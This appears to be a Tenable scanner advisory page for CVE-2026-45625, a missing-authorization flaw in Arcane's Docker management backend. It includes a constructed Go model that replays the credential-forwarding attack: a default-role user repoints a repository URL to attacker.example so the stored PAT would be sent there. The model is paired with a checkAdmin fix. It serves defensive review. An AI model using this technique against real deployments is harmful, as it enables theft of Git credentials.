SCA: security update for github.com/getarcaneapp/arcane/backend (GHSA-7h26-hg47-p9hx)

Tenable Cloud Security Plugin ID 442067 (Critical)

Description

There are packages installed that are affected by a vulnerability referenced in the following CVE:

- Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to 1.19.0, Arcane's huma-based REST API exposes nine endpoints under /api/customize/git-repositories and /api/git-repositories/sync for managing GitOps source repositories and their stored credentials. Eight of those endpoints (list, create, get, update, delete, test, listBranches, browseFiles) never call the checkAdmin(ctx) helper that every other admin-managed resource (container registries, environments, users, API keys, swarm, settings, system, notifications, events) uses, and the huma authentication middleware deliberately enforces only authentication, not the admin role. As a result, any logged-in user with the default user role can list, create, modify, delete, and test git repository configurations. By repointing an existing repository's URL to an attacker-controlled host while omitting the token/sshKey fields (which UpdateRepository only rewrites when explicitly supplied), the attacker causes Arcane to decrypt the legitimate PAT/SSH key on its next /test, /branches, or /files call and present it as HTTP Basic auth (or SSH key auth) to the attacker's host, producing a one-step exfiltration of plaintext Git credentials. This vulnerability is fixed in 1.19.0. (CVE-2026-45625)
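The two ingredients the advisory describes, an authenticated-but-unauthorized handler and an update that keeps the stored credential when the token field is omitted, are easier to reason about in code. The following Go program is an added illustration written for this page; it is not Arcane's source and does not use Arcane's real types or routes. Everything in it is constructed: the Role/Ctx types, the in-memory Store, the repository ID, the fake token ghp_constructedExampleToken and the hosts git.internal.example and attacker.example. Only the name checkAdmin and the "rewrite credentials only when supplied" behaviour are taken from the advisory text. It replays the one-step attack against a handler modelled on the pre-1.19.0 pattern and against a handler that calls checkAdmin first, and reports which host the PAT would be sent to on the next /test-style call.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
)

// Constructed model of the CVE-2026-45625 pattern, not Arcane's code: the types, store, token and
// attacker host are invented; only checkAdmin's name and the update-only-supplied-fields behaviour come from the advisory.
type Role string

const RoleUser, RoleAdmin Role = "user", "admin"

// Ctx stands in for the authenticated request context: the auth middleware guarantees a Role is present, not which one.
type Ctx struct{ Role Role }

var ErrForbidden = errors.New("forbidden: admin role required")

// checkAdmin is the per-handler role check the affected endpoints skipped.
func checkAdmin(ctx Ctx) error {
	if ctx.Role != RoleAdmin {
		return ErrForbidden
	}
	return nil
}

// GitRepository is a GitOps source plus its credential (encrypted at rest in the real app; plaintext here for illustration).
type GitRepository struct{ URL, Token string }

// UpdateInput uses pointers so a nil field means "omitted by the caller".
type UpdateInput struct{ URL, Token *string }

type Store struct{ repos map[int]*GitRepository }

// newStore seeds one repository with a fake PAT (constructed value).
func newStore() *Store {
	return &Store{repos: map[int]*GitRepository{1: {
		URL: "https://git.internal.example/ops/manifests.git", Token: "ghp_constructedExampleToken"}}}
}

// update rewrites only the supplied fields, so a new URL with Token omitted keeps the legitimate credential attached.
func (s *Store) update(id int, in UpdateInput) error {
	r, ok := s.repos[id]
	if !ok {
		return errors.New("repository not found")
	}
	if in.URL != nil {
		r.URL = *in.URL
	}
	if in.Token != nil {
		r.Token = *in.Token
	}
	return nil
}

// test models /test, /branches and /files: the stored credential is presented to whatever host the URL now names.
func (s *Store) test(id int) (host, token string, err error) {
	r, ok := s.repos[id]
	if !ok {
		return "", "", errors.New("repository not found")
	}
	u, err := url.Parse(r.URL)
	if err != nil {
		return "", "", err
	}
	return u.Host, r.Token, nil
}

// UpdateRepositoryVulnerable trusts authentication alone (the pre-1.19.0 pattern).
func UpdateRepositoryVulnerable(s *Store, _ Ctx, id int, in UpdateInput) error {
	return s.update(id, in)
}

// UpdateRepositoryFixed authorizes before touching the resource.
func UpdateRepositoryFixed(s *Store, ctx Ctx, id int, in UpdateInput) error {
	if err := checkAdmin(ctx); err != nil {
		return err
	}
	return s.update(id, in)
}

// Exfiltrate replays the advisory's one-step attack as a default-role user against handler h and reports where the PAT would go.
func Exfiltrate(h func(*Store, Ctx, int, UpdateInput) error) (host, token string, err error) {
	s := newStore()
	evil := "https://attacker.example/repo.git" // constructed attacker host
	if err := h(s, Ctx{Role: RoleUser}, 1, UpdateInput{URL: &evil}); err != nil {
		return "", "", err
	}
	return s.test(1)
}

func main() {
	for _, h := range []func(*Store, Ctx, int, UpdateInput) error{UpdateRepositoryVulnerable, UpdateRepositoryFixed} {
		if host, token, err := Exfiltrate(h); err != nil {
			fmt.Println("update rejected:", err)
		} else {
			fmt.Printf("/test would send %q to %s\n", token, host)
		}
	}
}
```

Against the vulnerable handler, the default-role user's update succeeds and the subsequent test call would carry the original token to attacker.example; against the fixed handler the update is rejected with ErrForbidden before the URL changes. The point for reviewers of similar code bases: an authentication middleware that only proves "someone is logged in" is not an authorization control, and a partial-update endpoint that preserves secrets when their fields are omitted turns any URL-repointing into a credential forwarder, so every handler on a resource that stores credentials needs its own role check.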

Solution

Update the github.com/getarcaneapp/arcane/backend library and its related packages to version 1.19.0 or later.

See Also

https://github.com/advisories/GHSA-7h26-hg47-p9hx

Plugin Details

Severity: Critical

ID: 442067

Version: Revision 1.7

Type: Local

Family: SCA Checks

Published: 5/18/2026

Updated: 7/2/2026

Supported Sensors: Tenable Cloud Security, Tenable Self-Hosted Container Security

Risk Information

VPR

Risk Factor: Medium

Score: 5

Percentile: 94.4

Vendor

Vendor Severity: Critical

CVSS v2

Risk Factor: High

Base Score: 9

Temporal Score: 6.7

Vector: CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C

CVSS Score Source: CVE-2026-45625

CVSS v3

Risk Factor: Critical

Base Score: 9.9

Temporal Score: 8.6

Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

Vulnerability Information

Exploit Ease: No known exploits are available

Patch Publication Date: 5/18/2026

Vulnerability Publication Date: 5/18/2026

Reference Information

CVE: CVE-2026-45625

CWE: CWE-862